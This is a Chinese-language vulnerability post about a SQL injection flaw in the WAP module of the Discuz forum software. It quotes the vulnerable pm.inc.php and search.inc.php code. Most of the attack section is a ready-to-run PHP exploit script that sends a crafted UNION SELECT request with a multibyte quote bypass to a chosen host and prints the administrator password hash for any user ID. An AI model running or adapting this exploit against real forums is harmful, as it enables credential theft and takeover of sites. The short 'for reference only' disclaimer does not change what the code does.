discuz获取任意管理员密码漏洞 's

文章作者：冰封浪子
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

漏洞说明：Discuz 论坛系统 是一套采用php+mysql数据库方式运行,在其中发现了一个安全漏洞，成功利用此漏洞可以提取管理员的密码进入后台，取得管理员权限。

漏洞厂商：http://www.discuz.net

漏洞解析：在Discuz的wap模块中的字符转码程序存在问题，在discuz的wap模块中，该编码转换类存在严重的问题。在Discuz中，wap是默认开启的，很容易被攻击者利用，这个问题存在与discuz所有版本中。
在discuz代码中存在多处可利用的地方，如:pm.inc.php/search.inc.php等，下面给出可疑代码片段：

pm.inc.php：

$floodctrl = $floodctrl * 2; if($floodctrl && !$disablepostctrl && $timestamp - $lastpost < $floodctrl) { wapmsg(’pm_flood_ctrl’); }  if($formhash != formhash()) { wapmsg(’wap_submit_invalid’); }  $member = $db->fetch_first(”SELECT m.uid AS msgtoid, mf.ignorepm FROM {$tablepre}members m LEFT JOIN {$tablepre}memberfields mf USING (uid) WHERE username=’$msgto’”); if(!$member) { wapmsg(’pm_send_nonexistence’); } if(preg_match(”/(^{ALL}$|(,|^)/s*”.preg_quote($discuz_user, ‘/’).”/s*(,|$))/i”, $member['ignorepm'])) { wapmsg(’pm_send_ignore’); } if(empty($subject) || empty($message)) { wapmsg(’pm_sm_isnull’); }

search.inc.php:

if(isset($searchid)) {  $page = max(1, intval($page)); $start_limit = $number = ($page - 1) * $waptpp;  $index = $db->fetch_first(”SELECT searchstring, keywords, threads, tids FROM {$tablepre}searchindex WHERE searchid=’$searchid’”); if(!$index) { wapmsg(’search_id_invalid1′); } $index['keywords'] = rawurlencode($index['keywords']); $index['searchtype'] = preg_replace(”/^([a-z]+)/|.*/”, “//1“, $index['searchstring']);  $searchnum = $db->result_first(”SELECT COUNT(*) FROM  {$tablepre}threads WHERE tid IN ($index[tids]) AND displayorder>=’0′”); if($searchnum) { echo “<p>$lang[search_result]<br />”; $query = $db->query(”SELECT * FROM {$tablepre}threads WHERE tid IN ($index[tids]) AND displayorder>=’0′ ORDER BY dateline DESC LIMIT $start_limit, $waptpp”); while($thread = $db->fetch_array($query)) { echo “<a href=/”index.php?action=thread&tid=$thread[tid]/”>#”.++$number.” “.cutstr($thread['subject'], 24).”</a>($thread290 views/$thread[replies])<br />/n”; } echo wapmulti($searchnum, $waptpp, $page, “index.php?action=search&searchid=$searchid&do=submit&sid=$sid”); echo ‘</p>’; } else { wapmsg(’search_invalid’); }

以下是search.inc.php 文件漏洞利用代码;
注:以下漏洞纯属个人兴趣爱好，仅供大家参考

<?php error_reporting(E_ALL&E_NOTICE); print_r(” +——————————————————————+ Exploit discuz6.0.1 Just work as php>=5 & mysql>=4.1 BY  冰封浪子&小志 +——————————————————————+ “);  if($argc>4) { $host=$argv[1]; $port=$argv[2]; $path=$argv[3]; $uid=$argv[4]; }else{ echo “Usage: php “.$argv[0].” host port path uid/n”; echo “host:      target server /n”; echo “port:      the web port, usually 80/n”; echo “path:      path to discuz/n”; echo “uid :      user ID you wanna get/n”; echo “Example:/r/n”; echo “php “.$argv[0].” localhost 80 1/n”; exit; }  $content =”action=search&searchid=22%cf’UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=”.$uid.”/*&do=submit”;  $data = “POST /”.$path.”/index.php”.” HTTP/1.1/r/n”; $data .= “Accept: */*/r/n”; $data .= “Accept-Language: zh-cn/r/n”; $data .= “Content-Type: application/x-www-form-urlencoded/r/n”; $data .= “User-Agent: wap/r/n”; $data .= “Host: “.$host.”/r/n”; $data .= “Content-length: “.strlen($content).”/r/n”; $data .= “Connection: Close/r/n”; $data .= “/r/n”; $data .= $content.”/r/n/r/n”; $ock=fsockopen($host,$port); if (!$ock) { echo ‘No response from ‘.$host; die; } fwrite($ock,$data); while (!feof($ock)) { echo fgets($ock, 1024); } ?>